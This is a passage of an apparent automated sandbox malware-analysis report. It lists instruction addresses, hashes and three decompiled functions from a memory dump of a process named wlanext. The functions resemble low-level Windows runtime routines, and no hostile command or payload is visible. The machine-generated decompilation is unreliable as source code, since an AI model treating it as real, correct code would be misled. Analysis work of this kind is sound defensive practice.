                                  0x034ec615
                                  0x034ec625
                                  0x034ec62d
                                  0x034ec635
                                  0x034ec640
                                  0x034ec680
                                  0x034ec687
                                  0x034ec688
                                  0x034ec689
                                  0x034ec694
                                  0x034ec694
                                  0x034ec642
                                  0x034ec64a
                                  0x034ec697
                                  0x03557a25
                                  0x03557a2b
                                  0x03557a2e
                                  0x03557a30
                                  0x03557bea
                                  0x03557bea
                                  0x00000000
                                  0x03557bea
                                  0x03557a36
                                  0x03557a43
                                  0x03557a48
                                  0x03557a4c
                                  0x03557a4e
                                  0x00000000
                                  0x00000000
                                  0x03557a58
                                  0x03557a5a
                                  0x03557a5b
                                  0x03557a5c
                                  0x03557a5d
                                  0x03557a63
                                  0x03557a64
                                  0x03557a6a
                                  0x03557a6c
                                  0x03557a6e
                                  0x035579cb
                                  0x035579cb
                                  0x035579ce
                                  0x035579d0
                                  0x03557a98
                                  0x03557a9b
                                  0x03557a9b
                                  0x03557a9e
                                  0x03557aa1
                                  0x03557bbe
                                  0x03557bbe
                                  0x03557bc0
                                  0x03557be0
                                  0x03557be0
                                  0x03557a01
                                  0x03557a01
                                  0x03557a05
                                  0x03557a07
                                  0x03557a15
                                  0x03557a15
                                  0x03557a1a
                                  0x00000000
                                  0x03557a1a
                                  0x03557bc2
                                  0x03557bc6
                                  0x03557bc9
                                  0x03557bcd
                                  0x03557bcf
                                  0x035579e6
                                  0x035579e6
                                  0x035579eb
                                  0x035579eb
                                  0x035579ef
                                  0x035579f1
                                  0x00000000
                                  0x00000000
                                  0x035579f3
                                  0x035579f5
                                  0x035579ff
                                  0x035579ff
                                  0x00000000
                                  0x035579ff
                                  0x035579f7
                                  0x035579fd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035579fd
                                  0x03557bd5
                                  0x03557bd8
                                  0x00000000
                                  0x00000000
                                  0x03557ba9
                                  0x03557bac
                                  0x03557bb0
                                  0x03557bb1
                                  0x03557bb1
                                  0x03557bb6
                                  0x00000000
                                  0x03557bb6
                                  0x03557aa7
                                  0x03557aaa
                                  0x00000000
                                  0x00000000
                                  0x03557ab2
                                  0x03557ab3
                                  0x03557ab5
                                  0x03557aec
                                  0x03557aef
                                  0x03557b25
                                  0x03557b28
                                  0x03557b62
                                  0x03557b64
                                  0x03557b8f
                                  0x03557b92
                                  0x03557b96
                                  0x03557b98
                                  0x00000000
                                  0x00000000
                                  0x03557b9e
                                  0x03557b9f
                                  0x03557ba3
                                  0x00000000
                                  0x03557ba3
                                  0x03557b66
                                  0x03557b68
                                  0x03557ae2
                                  0x03557ae2
                                  0x00000000
                                  0x03557ae2
                                  0x03557b6e
                                  0x03557b72
                                  0x03557b75
                                  0x03557b81
                                  0x03557b85
                                  0x03557b87
                                  0x00000000
                                  0x00000000
                                  0x03557b31
                                  0x03557b34
                                  0x03557b3c
                                  0x03557b45
                                  0x03557b46
                                  0x03557b4f
                                  0x03557b51
                                  0x03557b57
                                  0x03557b59
                                  0x03557b59
                                  0x00000000
                                  0x03557b59
                                  0x03557b77
                                  0x00000000
                                  0x03557b77
                                  0x03557b2a
                                  0x00000000
                                  0x03557b2a
                                  0x03557af1
                                  0x03557af3
                                  0x00000000
                                  0x00000000
                                  0x03557afb
                                  0x03557afc
                                  0x03557afe
                                  0x00000000
                                  0x00000000
                                  0x03557b00
                                  0x03557b03
                                  0x00000000
                                  0x00000000
                                  0x03557b05
                                  0x03557b09
                                  0x03557b0d
                                  0x03557b0f
                                  0x00000000
                                  0x00000000
                                  0x03557b18
                                  0x03557b1d
                                  0x00000000
                                  0x03557b1d
                                  0x03557ab7
                                  0x03557ab9
                                  0x00000000
                                  0x00000000
                                  0x03557abf
                                  0x03557ac1
                                  0x00000000
                                  0x00000000
                                  0x03557ac3
                                  0x03557ac6
                                  0x00000000
                                  0x00000000
                                  0x03557ac8
                                  0x03557acc
                                  0x03557ad0
                                  0x03557ad2
                                  0x00000000
                                  0x00000000
                                  0x03557adb
                                  0x00000000
                                  0x03557adb
                                  0x035579d6
                                  0x035579d9
                                  0x035579dc
                                  0x03557a91
                                  0x03557a94
                                  0x00000000
                                  0x03557a94
                                  0x035579e2
                                  0x00000000
                                  0x035579e2
                                  0x03557a74
                                  0x03557a7a
                                  0x00000000
                                  0x00000000
                                  0x03557a8a
                                  0x03557a21
                                  0x03557a21
                                  0x00000000
                                  0x03557a21
                                  0x034ec650
                                  0x034ec651
                                  0x034ec656
                                  0x034ec65c
                                  0x034ec65d
                                  0x034ec663
                                  0x034ec664
                                  0x034ec66a
                                  0x034ec66e
                                  0x035579c5
                                  0x035579c7
                                  0x00000000
                                  0x035579c7
                                  0x034ec67a
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 20bc6e5c8aba08cad85b132fed54d33fee93cf638d5dd6d487b7ec402ab42cf7
                                  • Instruction ID: 05c97747ba2e264ce6779b94f67b3069848cee4ca9bb1c4f3ff8ede82706642e
                                  • Opcode Fuzzy Hash: 20bc6e5c8aba08cad85b132fed54d33fee93cf638d5dd6d487b7ec402ab42cf7
                                  • Instruction Fuzzy Hash: 778181756042419BCB25CE14E8A0E6BB7F9FB88250F19486BFD459B260E331FD45CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0357B8D0 Relevance: .2, Instructions: 199COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
                                  			E0357B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x35d7b9c; // 0x0
				_t124 = L03504620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03529800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E035295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E035295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L035077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03529910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E035295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x35d7b9c; // 0x0
									_t92 = L03504620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03529910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E034EA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0357E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0357E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E035295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                  0x0357b8d9
                                  0x0357b8e4
                                  0x00000000
                                  0x0357b8e6
                                  0x0357b8f3
                                  0x0357b8f5
                                  0x0357b8f5
                                  0x0357b8f8
                                  0x0357b920
                                  0x0357b924
                                  0x0357b936
                                  0x0357b939
                                  0x0357b93d
                                  0x0357b948
                                  0x0357b9a0
                                  0x0357b9a0
                                  0x0357b9a4
                                  0x0357b9bf
                                  0x0357b9c4
                                  0x0357b9c6
                                  0x0357b9cd
                                  0x0357b9d1
                                  0x0357bad4
                                  0x0357bad8
                                  0x0357bada
                                  0x0357badc
                                  0x0357badc
                                  0x0357badf
                                  0x0357bae0
                                  0x0357bae2
                                  0x0357bae4
                                  0x0357baec
                                  0x0357baee
                                  0x0357baf0
                                  0x0357baf0
                                  0x0357baec
                                  0x0357bafb
                                  0x0357bafc
                                  0x0357bafe
                                  0x0357bb01
                                  0x0357bb01
                                  0x00000000
                                  0x0357bb06
                                  0x0357b9d7
                                  0x0357b9db
                                  0x0357b9db
                                  0x0357b9de
                                  0x0357b9de
                                  0x0357b9e4
                                  0x0357b9e7
                                  0x0357b9ea
                                  0x0357b9ec
                                  0x0357b9ef
                                  0x0357b9f3
                                  0x0357ba1b
                                  0x0357ba1b
                                  0x0357ba23
                                  0x0357ba24
                                  0x0357ba27
                                  0x0357ba2a
                                  0x0357ba2b
                                  0x0357ba2e
                                  0x0357ba30
                                  0x0357ba37
                                  0x0357ba3f
                                  0x0357ba9c
                                  0x0357baa2
                                  0x0357bb13
                                  0x0357bb15
                                  0x0357baae
                                  0x0357baae
                                  0x0357bab3
                                  0x0357bab5
                                  0x0357baba
                                  0x0357bac8
                                  0x0357bac8
                                  0x0357baba
                                  0x0357bacd
                                  0x0357bacf
                                  0x00000000
                                  0x0357bacf
                                  0x0357bb1a
                                  0x00000000
                                  0x0357bb1c
                                  0x0357baa7
                                  0x0357bb11
                                  0x00000000
                                  0x0357bb11
                                  0x0357baa9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0357ba41
                                  0x0357ba41
                                  0x0357ba41
                                  0x0357ba58
                                  0x0357ba5d
                                  0x0357ba62
                                  0x00000000
                                  0x00000000
                                  0x0357ba64
                                  0x0357ba67
                                  0x0357ba68
                                  0x0357ba69
                                  0x0357ba6c
                                  0x0357ba6f
                                  0x0357ba71
                                  0x0357ba78
                                  0x0357ba80
                                  0x00000000
                                  0x00000000
                                  0x0357ba90
                                  0x0357ba90
                                  0x0357ba97
                                  0x00000000
                                  0x0357ba97
                                  0x0357b9f5
                                  0x0357b9f7
                                  0x0357b9f7
                                  0x0357b9fa
                                  0x0357ba03
                                  0x0357ba07
                                  0x0357ba0c
                                  0x0357ba10
                                  0x0357ba17
                                  0x00000000
                                  0x0357b9f7
                                  0x0357b9a6
                                  0x0357b9a8
                                  0x0357b9af
                                  0x0357b9b3
                                  0x00000000
                                  0x00000000
                                  0x0357b9b9
                                  0x00000000
                                  0x0357b9b9
                                  0x0357b94d
                                  0x0357b98f
                                  0x0357b995
                                  0x0357b999
                                  0x0357b960
                                  0x0357b967
                                  0x0357b968
                                  0x0357b96a
                                  0x00000000
                                  0x0357b96a
                                  0x0357b99b
                                  0x0357b99e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0357b99e
                                  0x0357b951
                                  0x0357b954
                                  0x0357b95a
                                  0x0357b95e
                                  0x0357b972
                                  0x0357b979
                                  0x0357b97d
                                  0x0357b97f
                                  0x0357b980
                                  0x0357b982
                                  0x0357b984
                                  0x00000000
                                  0x0357b984
                                  0x00000000
                                  0x0357b926
                                  0x00000000
                                  0x0357b926

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6d55e210ed11ce4dd8fa74e970e57a197db9e2aced1c9d9024a92c440f2fd3f
                                  • Instruction ID: 3cf5ae45616e6af3f5cfb9934afc0b8cf7cfeca0ba297268c01746bd5e9efbb4
                                  • Opcode Fuzzy Hash: a6d55e210ed11ce4dd8fa74e970e57a197db9e2aced1c9d9024a92c440f2fd3f
                                  • Instruction Fuzzy Hash: 2F71FD36200702AFD721DF15E845F66BBB5FF84720F194928EA658B2F0EB71E941CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03566DC9 Relevance: .2, Instructions: 199COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E03566DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03566B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03507D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03529AE0();
					_t87 = L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0356795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0356795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0356795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0356795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03504620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03566B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03566B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03566B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03566B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03507D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03529AE0();
								L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03502400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03502400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03502400( &_v52);
							}
							if(_v28 >= 0) {
								return L03502400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                  0x03566dd4
                                  0x03566dde
                                  0x03566de1
                                  0x03566de3
                                  0x03566de6
                                  0x03566de9
                                  0x03566dec
                                  0x03566def
                                  0x03566df2
                                  0x03566df5
                                  0x03566dfe
                                  0x03566e04
                                  0x03566e09
                                  0x03566e0d
                                  0x03566e18
                                  0x03566e1b
                                  0x03566e22
                                  0x03566e2d
                                  0x03566e30
                                  0x03566e36
                                  0x03566e42
                                  0x03566e4d
                                  0x03566e50
                                  0x03566e55
                                  0x03566e5c
                                  0x03566e6e
                                  0x03566e5e
                                  0x03566e67
                                  0x03566e67
                                  0x03566e73
                                  0x03566e74
                                  0x03566e77
                                  0x03566e7c
                                  0x03566e7d
                                  0x03566e8e
                                  0x03566e93
                                  0x03566e9c
                                  0x03566ea8
                                  0x03566eab
                                  0x03566eac
                                  0x03566eb3
                                  0x03566ecd
                                  0x03566edc
                                  0x03566ee2
                                  0x03566ee5
                                  0x03566ef2
                                  0x03566efb
                                  0x03566f01
                                  0x03566f06
                                  0x03566f0b
                                  0x03566f11
                                  0x03566f1a
                                  0x03566f22
                                  0x03566f26
                                  0x03566f26
                                  0x03566f33
                                  0x03566f41
                                  0x03566f44
                                  0x03566f47
                                  0x03566f54
                                  0x03566f65
                                  0x03566f77
                                  0x03566f7c
                                  0x03566f82
                                  0x03566f91
                                  0x03566f99
                                  0x03566fa3
                                  0x03566fae
                                  0x03566fae
                                  0x03566fba
                                  0x03566fbb
                                  0x03566fbc
                                  0x03566fc1
                                  0x03566fc2
                                  0x03566fd3
                                  0x03566fd8
                                  0x03566fd8
                                  0x03566fdf
                                  0x03566fe8
                                  0x03566fee
                                  0x03566fee
                                  0x03566ff5
                                  0x03566ffb
                                  0x03566ffb
                                  0x03567004
                                  0x00000000
                                  0x0356700a
                                  0x03567004
                                  0x03566eb3
                                  0x03566e9c
                                  0x03567015

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                  • Instruction ID: e30aff6d2353c221eb5f1d30f57ae107dd95f400906fb907da997cf22ab9db6c
                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                  • Instruction Fuzzy Hash: B4718075A00619EFCB10DFA5D984AEEFBB9FF88714F144569E504EB2A0D730EA41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E52A5 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E034E52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E034FEEF0(0x35d79a0);
					_t104 =  *0x35d8210; // 0xb42bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E034FEB70(_t93, 0x35d79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E03529890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E034FEEF0(0x35d79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E034FEB70(0, 0x35d79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xb42bc802
								_t13 = _t104 + 0xc; // 0xb42bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0351F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E034FEEF0(0x35d79a0);
									__eflags =  *0x35d8210 - _t104; // 0xb42bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x35d8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000b42b
											_t95 =  *((intOrPtr*)( *_t37));
											E03564888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E034FEB70(_t95, 0x35d79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E035295D0();
											L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E035295D0();
											L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E034FEB70(_t93, 0x35d79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E035295D0();
										L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E035295D0();
										L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000b42b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xb42bc802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0351F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                  0x034e52a5
                                  0x034e52ad
                                  0x034e52b0
                                  0x034e52b3
                                  0x034e52b7
                                  0x034e52ba
                                  0x034e52bf
                                  0x034e52c4
                                  0x034e52cc
                                  0x00000000
                                  0x00000000
                                  0x034e52ce
                                  0x034e52d1
                                  0x034e52d9
                                  0x034e52dd
                                  0x034e52e7
                                  0x034e52f7
                                  0x034e52f9
                                  0x034e52fd
                                  0x03540dcf
                                  0x03540dd5
                                  0x03540dd6
                                  0x03540dd7
                                  0x03540dd8
                                  0x03540dd9
                                  0x03540dde
                                  0x03540ddf
                                  0x03540de0
                                  0x03540de1
                                  0x03540de2
                                  0x03540de2
                                  0x03540de5
                                  0x03540dea
                                  0x03540dec
                                  0x03540f60
                                  0x03540f64
                                  0x03540f70
                                  0x03540f76
                                  0x03540f79
                                  0x03540f79
                                  0x00000000
                                  0x03540f64
                                  0x03540df2
                                  0x03540df7
                                  0x03540e04
                                  0x03540e04
                                  0x03540e0d
                                  0x03540e0d
                                  0x03540e10
                                  0x03540e1a
                                  0x03540e1c
                                  0x03540e4c
                                  0x03540e52
                                  0x03540e61
                                  0x03540e67
                                  0x03540e6b
                                  0x03540e70
                                  0x03540e76
                                  0x03540ed7
                                  0x03540edc
                                  0x03540ee0
                                  0x03540ee6
                                  0x03540eea
                                  0x03540eed
                                  0x03540ef0
                                  0x03540ef3
                                  0x03540ef6
                                  0x03540ef9
                                  0x03540efb
                                  0x03540efe
                                  0x03540f01
                                  0x03540f01
                                  0x03540f0b
                                  0x03540f12
                                  0x03540f16
                                  0x03540f18
                                  0x03540f18
                                  0x03540f1b
                                  0x03540f2c
                                  0x03540f31
                                  0x03540f31
                                  0x03540f35
                                  0x03540f39
                                  0x03540f3a
                                  0x03540f3c
                                  0x03540f3c
                                  0x03540f3f
                                  0x03540f50
                                  0x03540f55
                                  0x03540f55
                                  0x03540f59
                                  0x034e52eb
                                  0x034e52f1
                                  0x034e52f1
                                  0x03540e7d
                                  0x03540e84
                                  0x03540e88
                                  0x03540e8a
                                  0x03540e8a
                                  0x03540e8d
                                  0x03540e9e
